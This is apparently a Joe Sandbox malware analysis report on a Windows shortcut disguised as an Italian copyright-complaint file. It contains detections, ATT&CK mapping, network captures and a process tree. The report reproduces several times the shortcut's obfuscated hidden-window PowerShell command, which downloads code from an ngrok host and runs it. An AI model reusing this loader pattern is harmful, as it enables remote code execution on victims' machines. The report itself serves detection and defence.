Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
PowerShell
1
DLL Side-Loading
11
Process Injection
1
Virtualization/Sandbox Evasion
OS Credential Dumping1
Virtualization/Sandbox Evasion
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk35%VirustotalBrowse
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk18%ReversingLabsShortcut.Trojan.Pantera
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
5awvoe1sr8b6b5g9cfxz.ngrok.app
3.13.191.225
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50betrue
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    3.13.191.225
    5awvoe1sr8b6b5g9cfxz.ngrok.appUnited States
    16509AMAZON-02UStrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1578153
    Start date and time:2024-12-19 10:44:53 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 3m 31s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
    Run name:Potential for more IOCs and behavior
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
    Detection:MAL
    Classification:mal72.winLNK@4/3@1/1
    Cookbook Comments:
    • Found application associated with file extension: .lnk
    • Stop behavior analysis, all processes terminated
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Not all processes where analyzed, report is missing behavior information
    TimeTypeDescription
    04:46:57API Interceptor13x Sleep call for process: powershell.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    3.13.191.225EjNEMp1NTE.exeGet hashmaliciousRedLineBrowse
    • 54ea-20-124-134-110.ngrok.io/
    RnT6mMyI7d.exeGet hashmaliciousHog Grabber ItroublveBOT Stealer XmrigBrowse
    • 6ce0-2001-1bb0-e000-1e-00-c3c.ngrok.io/aa.exe
    eQDy6dGVwQ.exeGet hashmaliciousLokibot PonyBrowse
    • 63e2e5290bcf.ngrok.io/dump.exe
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    5awvoe1sr8b6b5g9cfxz.ngrok.appRapporteer inbreuk op auteursrechten.lnk.d.lnkGet hashmaliciousUnknownBrowse
    • 3.125.102.39
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AMAZON-02USpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 184.77.160.143
    DeltaX.exeGet hashmaliciousUnknownBrowse
    • 54.230.112.122
    CROC000400 .pdfGet hashmaliciousUnknownBrowse
    • 108.158.75.106
    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 35.167.216.68
    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 35.156.171.87
    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 3.163.158.110
    x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
    • 3.248.220.130
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    3b5074b1b5d032e5620f69f9f700ff0eDHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
    • 3.13.191.225
    4089137200.exeGet hashmaliciousAgentTeslaBrowse
    • 3.13.191.225
    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
    • 3.13.191.225
    Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
    • 3.13.191.225
    Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
    • 3.13.191.225
    main1.batGet hashmaliciousAbobus ObfuscatorBrowse
    • 3.13.191.225
    66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
    • 3.13.191.225
    dlhost.exeGet hashmaliciousXWormBrowse
    • 3.13.191.225
    NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
    • 3.13.191.225
    No context
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):64
    Entropy (8bit):0.34726597513537405
    Encrypted:false
    SSDEEP:3:Nlll:Nll
    MD5:446DD1CF97EABA21CF14D03AEBC79F27
    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
    Malicious:false
    Reputation:high, very likely benign file
    Preview:@...e...........................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Reputation:high, very likely benign file
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Reputation:high, very likely benign file
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
    Entropy (8bit):3.7223232228578276
    TrID:
    • Windows Shortcut (20020/1) 100.00%
    File name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
    File size:2'590 bytes
    MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
    SHA1:1376441bc8171553125dac0415240a81859ee8f7
    SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
    SHA512:e9a8df752694ca6d184c480beb27d12a2f48f1b7d084b7372ec8387046db47fb7e84fd048fb1fe3a32ad63e0454345febc6d3a32b176d20d281c0388b60835e7
    SSDEEP:48:8GIgax4PsU/rJETWap8irXBblgGd0lL4XuH4Xv3SsgoQYk:8fgaxEs2rWTWauiFhgdl2uWvZg5Y
    TLSH:5D51BF252BD91734F3B74E754976A2519A7AB946BC224F1D408042480C62B19EC75F2B
    File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......
    Icon Hash:929e9e96a3f3d6ed

    General

    Relative Path:..\..\..\..\Windows\System32\cmd.exe
    Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    TimestampSource PortDest PortSource IPDest IP
    Dec 19, 2024 10:46:59.589823008 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:46:59.589865923 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:46:59.590095043 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:46:59.597717047 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:46:59.597740889 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:46:59.937944889 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:46:59.938158989 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:46:59.942478895 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:46:59.942501068 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:46:59.942873955 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:46:59.950187922 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:46:59.990266085 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:47:00.294810057 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:47:00.294984102 CET443497553.13.191.225192.168.11.20
    Dec 19, 2024 10:47:00.295119047 CET49755443192.168.11.203.13.191.225
    Dec 19, 2024 10:47:00.300605059 CET49755443192.168.11.203.13.191.225
    TimestampSource PortDest PortSource IPDest IP
    Dec 19, 2024 10:46:59.398899078 CET5022653192.168.11.201.1.1.1
    Dec 19, 2024 10:46:59.580806971 CET53502261.1.1.1192.168.11.20
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Dec 19, 2024 10:46:59.398899078 CET192.168.11.201.1.1.10xf11cStandard query (0)5awvoe1sr8b6b5g9cfxz.ngrok.appA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Dec 19, 2024 10:46:59.580806971 CET1.1.1.1192.168.11.200xf11cNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.13.191.225A (IP address)IN (0x0001)false
    Dec 19, 2024 10:46:59.580806971 CET1.1.1.1192.168.11.200xf11cNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.134.39.220A (IP address)IN (0x0001)false
    Dec 19, 2024 10:46:59.580806971 CET1.1.1.1192.168.11.200xf11cNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.17.7.232A (IP address)IN (0x0001)false
    Dec 19, 2024 10:46:59.580806971 CET1.1.1.1192.168.11.200xf11cNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.134.125.175A (IP address)IN (0x0001)false
    Dec 19, 2024 10:46:59.580806971 CET1.1.1.1192.168.11.200xf11cNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.14.182.203A (IP address)IN (0x0001)false
    Dec 19, 2024 10:46:59.580806971 CET1.1.1.1192.168.11.200xf11cNo error (0)5awvoe1sr8b6b5g9cfxz.ngrok.app3.22.30.40A (IP address)IN (0x0001)false
    • 5awvoe1sr8b6b5g9cfxz.ngrok.app
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.11.20497553.13.191.2254431952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    TimestampBytes transferredDirectionData
    2024-12-19 09:46:59 UTC218OUTGET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
    Host: 5awvoe1sr8b6b5g9cfxz.ngrok.app
    Connection: Keep-Alive
    2024-12-19 09:47:00 UTC162INHTTP/1.1 404 Not Found
    Connection: close
    Content-Type: text/plain
    Ngrok-Error-Code: ERR_NGROK_3200
    Date: Thu, 19 Dec 2024 09:47:00 GMT
    Content-Length: 67
    2024-12-19 09:47:00 UTC67INData Raw: 54 75 6e 6e 65 6c 20 35 61 77 76 6f 65 31 73 72 38 62 36 62 35 67 39 63 66 78 7a 2e 6e 67 72 6f 6b 2e 61 70 70 20 6e 6f 74 20 66 6f 75 6e 64 0d 0a 0d 0a 45 52 52 5f 4e 47 52 4f 4b 5f 33 32 30 30 0d 0a
    Data Ascii: Tunnel 5awvoe1sr8b6b5g9cfxz.ngrok.app not foundERR_NGROK_3200


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:04:46:57
    Start date:19/12/2024
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
    Imagebase:0x7ff607d70000
    File size:289'792 bytes
    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:04:46:57
    Start date:19/12/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff74a990000
    File size:875'008 bytes
    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:04:46:57
    Start date:19/12/2024
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
    Imagebase:0x7ff770ea0000
    File size:452'608 bytes
    MD5 hash:04029E121A0CFA5991749937DD22A1D9
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly